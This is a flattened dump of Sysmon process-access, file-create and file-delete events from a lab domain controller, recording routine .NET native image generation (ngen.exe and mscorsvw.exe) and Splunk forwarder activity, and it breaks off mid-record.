10341000x800000000000000021701Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.674{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22F-60D3-9504-00000000CF01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021700Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:51.596{4DB9351A-A22F-60D3-9404-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1864-0\System.IO.Compression.FileSystem.dll2021-06-23 21:05:51.596 10341000x800000000000000021699Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.565{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22F-60D3-9404-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021698Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.549{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A22F-60D3-9404-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021697Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.549{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22F-60D3-9404-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021696Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.503{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22F-60D3-9304-00000000CF01}6788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021695Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.487{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A22F-60D3-9304-00000000CF01}6788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021694Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.487{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22F-60D3-9304-00000000CF01}6788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021693Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:51.424{4DB9351A-A22F-60D3-9204-00000000CF01}6648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19f8-0\System.IO.Compression.dll2021-06-23 21:05:51.424 10341000x800000000000000021692Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.284{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22F-60D3-9204-00000000CF01}6648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021691Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.253{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A22F-60D3-9204-00000000CF01}6648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021690Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.253{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22F-60D3-9204-00000000CF01}6648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021689Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.206{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22F-60D3-9104-00000000CF01}6612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021688Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.174{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A22F-60D3-9104-00000000CF01}6612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021687Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.174{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22F-60D3-9104-00000000CF01}6612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021686Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:51.112{4DB9351A-A22E-60D3-9004-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\fec-0\System.IdentityModel.Services.dll2021-06-23 21:05:51.112 23542300x800000000000000021685Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.081{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D6F13B24738F1268A9F5308D66BB3EDC,SHA256=FA395725979C0DAB615473BF3C612DDA4FA5ED5618A103F23BB0368E59A7C330,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021716Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.831{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29679210C1150072469DD397E3862661,SHA256=4B1002DBE85C7E2774912D3A3B706CEF8EB4AA335F675E45C692065D2F4C08F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021715Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.331{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8FA1943A2FABBAC5C3544158233DD89,SHA256=B18273EECAD546BC9D01425BFE18FA8030AB04C21786A3C5B6B464CC6FF8A3DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021714Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.284{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A230-60D3-9804-00000000CF01}3196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021713Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.253{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A230-60D3-9804-00000000CF01}3196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021712Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.253{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A230-60D3-9804-00000000CF01}3196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021711Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.065{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A230-60D3-9704-00000000CF01}6152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021710Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.049{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A230-60D3-9704-00000000CF01}6152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021709Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.049{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A230-60D3-9704-00000000CF01}6152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.846{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=754A1F4E66E230EEE470E072C4B14D02,SHA256=A5255FA24D0A4B9CDEE6498A6772212AB53CF1EA8459D97690179D7517FA65ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.315{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95C3A167E690549D55BD8B4D6C54DABD,SHA256=7A3AFB7237BC84781919EB4E66AA087671DC0938C2579AD112A42150E87EBE55,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.096{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A230-60D3-9904-00000000CF01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 